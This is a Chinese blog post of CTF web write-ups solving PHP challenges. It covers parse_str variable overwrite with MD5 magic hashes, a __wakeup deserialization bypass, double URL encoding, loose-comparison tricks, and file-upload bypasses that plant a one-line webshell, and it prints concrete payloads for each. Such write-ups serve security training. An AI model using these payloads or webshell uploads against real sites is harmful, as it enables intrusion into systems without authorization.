最近做的题的wp

最新推荐文章于 2023-08-11 15:52:58 发布
最新推荐文章于 2023-08-11 15:52:58 发布
阅读量544 收藏 1
点赞数 2
分类专栏: CTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Anton__1/article/details/119780538
版权

variacover

主要考点是变量覆盖

<meta charset="utf-8">
<?php
error_reporting(0);
if (empty($_GET['b'])) {
    show_source(__FILE__);
    die();
}else{
    include('flag.php');
$a = "www.XMAN.com";
$b = $_GET['b'];
@parse_str($b);
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) //判断$a[0]的值不是QNKCDZO且$a[0]的MD5值要和QNKCDZO的MD5值相同
{
    echo $flag;
}else{
exit('你的答案不对0.0');
}
}
?>

接受参数的只有变量b,但是需要更改参数a[0]

@parse_str($b)把查询字符串解析到变量中,如果有同名变量,将原来的覆盖。

由于PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。

PHP处理0e开头md5哈希字符串缺陷/bug

构造payload:

?b=a[0]=s878926199a

拿到flag ayyctf{318fa61ae531e1778ffa6661c9b1ff06}

upload1

F12 删除前端认证,然后上一句话木马 蚁剑连接拿flag

upload

先bp抓包上传.htaccess文件,将png文件解析为php文件,然后上一句话木马 蚁剑连接拿flag

unserialize3

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

反序列化 利用php中的new 实例化类xctf

<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
    }
}
$a=new xctf();
echo(serialize($a));
?>

获得payload:

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

利用_wakeup()函数漏洞

把1改成2

O:4:"xctf":2:{s:4:"flag";s:3:"111";}

PHP2

没有头绪

扫了一下目录看到了index.phps

拿到源码

<?php
if("admin"===$_GET[id]) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

Can you anthenticate to this website?

传一个名为id的参数,参数值必须为经过url编码后的admin

因为url发到服务器那里会自动解码一次

所以需要二次编码

payload:

/index.php?id=%2561%2564%256d%2569%256e

PHP

扫目录拿到index.php~

拿到源码

<?php
$a=0;
$b=0;
$c=0;
if (isset($_GET['aaa']))
{
        $aaa = $_GET['aaa'];
		$aaa=="1"?die("Emmm..."):NULL;
        switch ($aaa)
        {
        case 0:
        case 1:
                $a=1;
                break;
        }
}
$bbb=(array)json_decode(@$_GET['bbb']);
if(is_array($bbb)){
    is_numeric(@$bbb["ccc"])?die("Emmm..."):NULL;
    if(@$bbb["ccc"]){
        ($bbb["ccc"]>2017)?$b=1:NULL;
    }
	if(is_array(@$bbb["ddd"])){
        if(count($bbb["ddd"])!==2 OR !is_array($bbb["ddd"][0])) die("Emmm...");
        $eee = array_search("XMAN", $bbb["ddd"]);
        $eee===false?die("Emmm..."):NULL;
        foreach($bbb["ddd"] as $key=>$val){
            $val==="XMAN"?die("Emmm..."):NULL;
        }
        $c=1;
}
}
if($a && $b && $c){
    include "flag.php";
    echo $flag;
}
?>

三个参数都为1时可以拿到flag

$a:

​ witch…case的弱类型比较,可以用1a绕过

$b:

​ $bbb[“ccc”]>2017 依然是弱类型比较, 让’ccc’ => ‘2018a’ 即可

$c:

​ array_search函数的绕过,

构造payload:

/index.php?aaa=1a&bbb={"ccc":"2018a","ddd":[[""],0]}

拿到flag

ayyctf{a2e43398d5d1a8513b233b2f0f8fa86f}

H3h3QAQ
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真 wp思路
08-17
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真 wp思路
练习 > CTF解 > OpenCTF 2017 > variacover(变量覆盖和MD5绕过)
Gunther的博客
09-09 2862
<?php error_reporting(0); if (empty($_GET['id'])) { show_source(__FILE__); die(); }else{ include('flag.php'); $a = "www.OPENCTF.com"; $id = $_GET['id']; @parse_str($id); if ($a[0] != 'QNKC
文件上传漏洞最强总结
Jack_chao_的博客
04-07 356
没写完后续补充
Xman资格选拔赛-web
weixin_30709929的博客
07-20 763
variacover 这道一打开就是源码,主要就是根据源码构造url。其中,它接收的参数只有b,但源码中要获取flag的关键参数是a[0]。parse_str()函数的作用是把查询字符串解析到变量中,于是我们可以通过将a[0]嵌入b的传参中,然后由这个函数再将a[0]提取出来,解析出a[0]后,还需要满足其值是MD5加密后与MD5('QNKCDZO’)的值相等,但加密前的字符串不相等,因为QN...
XMAN
csu_vc的博客
07-17 1322
先从web开始说起吧,因为错过了时间所以在平台关闭之前抓紧时间练了一练,中间请教了几个大佬web第一——variacover拿到目,是个源代码 发现这里存在变量覆盖,还有看到两个MD5==,往弱口令方向想,然后 一开始我还不知道为什么,然后搜了一下才懂得 0e后面会被识别成0的10的多少次方,再加上php是弱语言,会自动判断数据类型,所以零=零WEB第二——urldecode
攻防世界WEB---unserialize3
Red Rapefruit
07-23 929
攻防世界WEB—unserialize3 本文仅记录我自己的学习过程 unserialize3 目: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 给出的是一个代码块页面,而且还是不完整的,在这里我们可以得到两部分内容:1.一个xctf的类;2.要返回一个code参数,还有目提示的反序列化函数unserialize().既然是反序列化,那么code传入很有可能x
babyvm wp
12-21
大佬给的练习,应该是根据广外2019比赛babyvm改的,自己也是第一次接触vm的ctf,很简单,记录下。 目下载地址: 链接:https://pan.baidu.com/s/1fWfikdoviwZ2PnkCi2p2zA 提取码:4gbf 0x0 函数分析 载入IDA,...
Oj-writeup:记录的知识点及wp
03-15
Oj写记录的知识点及wp
第二届赣网杯WEB第一WP.docx
12-06
2021第二届赣网杯WEB第一WP
公司常用的wp7面试
07-10
公司常用的wp7面试,包括wp7基础理论,c#语法
学习笔记 | PHP反序列化漏洞
m0_57133419的博客
08-11 170
其中wakeup()函数漏洞原理是类对象属性个数超过实际个数,也就是其中的类名称后面跟的数字就是属性,修改为2时,不执行wakeup函数。就不会输出bad request,如果用没修改过的序列化语句就会输出bad request。看到wakeup函数,先构造序列化语句输出。攻防世界unserialize3。
ctf每日练习-第一天
想变得强大,虽然现在还弱不禁风
08-28 538
unserialize3(来自xctf web进阶区) unserialize3目链接 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 原理: PHP反序列化漏洞:执行unserialize()时,先会调用__wakeup()。 当序列化字符串中属性值个数大于属性个数,就会导致反序列化异常,从而跳过__wakeup()。 本_wakeup会执行exit(),所以要绕
攻防世界-web-高手进阶区-unserialize3
wyj_1216 House
07-10 865
目 writeup class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } 分析上述代码,发现:_wakeup() 考虑反序列化 <?php class xctf{ public $flag = '111'; public function __wakeup(){ exi...
XCTF靶场实战(1)
weixin_51339377的博客
03-29 1238
新手练习区 1 禁用js 2 robots.txt在网站根目录 里面可以规定搜索引擎看或者不看什么内容 3 xxxx.txt.bak index.phpsxxxx.rar.zip.7z.tar.gz.bak.txt.swp github www.xxx.com/.git/config 苹果电脑 .DS_Store 文件/目录泄露 svn文件泄露 subversion,开源代码控制系统 www.xxx.com/.svn/entires ...
XMAN2017选拔赛Web-variacover
hyrzhrc的博客
07-16 1895
由于PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。
xctf攻防世界 Web高手进阶区 unserialize3
l8947943的博客
07-24 9266
深度剖析PHP序列化和反序列化
PHP反序列化小
qq_74020399的博客
05-18 155
绕过方法:在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行wakeup()函数,即当前函数中只有一个参数$flag,若传入的序列化字符串中的参数个数为2即可绕过。原理:_wakeup()函数若不绕过则会将马上就要反序列化的字串中file给你替换为index,这样就会导致页面回到当前页面。在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行wakeup()函数。wakeup():反序列化之前检查执行的函数,不论如何都会优先执行wakeup()方法。
【攻防世界-Web】unserialize3解思路
一个手掰橙的博客
09-23 2767
CTF解思路
一猥琐的PHP后门分析
橙虚缘空间
04-18 1124
Webshell代码如下:&lt;?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*...
有道云笔记 渗透测试文件上传核wp
最新发布
10-12
有道云笔记是一款文件管理和云存储平台,用户可以将各种文件上传至云端进行保存和管理。针对有道云笔记的渗透测试的文件上传核,主要是测试目标是否存在文件上传漏洞。 文件上传漏洞是指攻击者通过上传恶意文件或者利用上传功能绕过限制,成功在目标服务器上执行任意代码或者获取未授权的访问权限。攻击者可通过上传特定类型的文件,利用后台执行逻辑漏洞或者文件解析漏洞,从而实现对目标系统的攻击或控制。 针对有道云笔记的文件上传漏洞,常见的测试方法包括: 1. 尝试上传各种类型的文件:测试能否上传系统可执行文件、脚本文件或者危险的文件类型。 2. 绕过后台验证:尝试修改请求报文、绕过文件类型检查、篡改上传文件路径等,测试服务器是否能正确地执行上传操作的检查。 3. 文件解析漏洞测试:测试上传的文件是否能够被服务器直接解析,并且触发对应的解析漏洞。 4. 文件重命名与遍历:测试能否修改上传文件的文件名,并尝试通过../等目录遍历操作访问到其他敏感文件。 针对发现的漏洞和问,需要将测试结果整理成详细的渗透测试报告,包括漏洞描述、危害程度评估和修复建议等。然后与有道云笔记的开发团队和管理员进行沟通,提供测试结果和修复建议,并跟踪漏洞修复进展。 及时发现和修复文件上传漏洞,对于保护用户数据和防止潜在的攻击十分重要。因此,有道云笔记应该充分重视渗透测试的文件上传核,加强安全意识和漏洞修复的流程,确保用户数据的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值